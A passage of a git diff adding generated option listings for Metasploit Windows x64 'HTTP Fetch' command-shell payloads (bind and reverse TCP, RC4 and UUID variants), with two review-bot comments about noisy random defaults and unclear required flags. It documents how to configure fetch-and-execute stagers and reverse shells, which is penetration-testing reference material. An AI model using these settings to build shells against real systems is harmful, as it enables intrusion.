SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt new file mode 100644 index 0000000..b93dfed --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/shell/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME MFGFwkbAEqO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt new file mode 100644 index 0000000..222e3a5 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt 
@@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/shell/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GLnwvbuI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..17ee22b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/shell/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME PIgvnfZgroJm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..53dffb6 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/shell/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LqWwxSXLoC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt new file mode 100644 index 0000000..0097b4c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt 
@@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/shell/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME zQMoeUSRyZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..2a5e057 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt 
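Review bot: the FETCH_FILENAME default in the reverse_tcp_rc4 dump (zQMoeUSRyZ, and a different random string in every other file of this patch) is generated fresh on each run of the option lister, so every regeneration of these files will rewrite that line in all of them and bury genuine option changes in noise; consider having the generator replace the random default with a fixed placeholder such as `<random>` before the files are committed. A second, smaller point on the same hunk: RC4PASSWORD is shown with the default `msf`, and since this option is what the stage key is derived from, a one-line remark in the dump that the default key is public (so a stage encrypted with it is readable by anyone who captures the traffic) would make the table more useful to readers.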
@@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/shell/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME yTLZJCRAVyZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate 
false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..1f5e595 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt 
@@ -0,0 +1,66 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline + Module: payload/cmd/windows/http/x64/shell_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME CgAtbYIFbN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection and spawn a command shell (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..58a520a --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt 
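Review bot: in the shell_bind_tcp dump FETCH_SRVHOST is marked Required `yes`, whereas the reverse_tcp dumps in this same patch mark it `no`; nothing in the generated text explains the difference (presumably the reverse payloads have LHOST to fall back on while a bind payload does not), so a short note in the accompanying README, or in the generator's header comment, would save readers from treating it as a typo. Note also that RHOST is listed as not required with an empty default, so the table as shown does not tell the reader what is actually needed to build this payload.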
@@ -0,0 +1,73 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline + Module: payload/cmd/windows/http/x64/shell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VoSqRFFys no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode 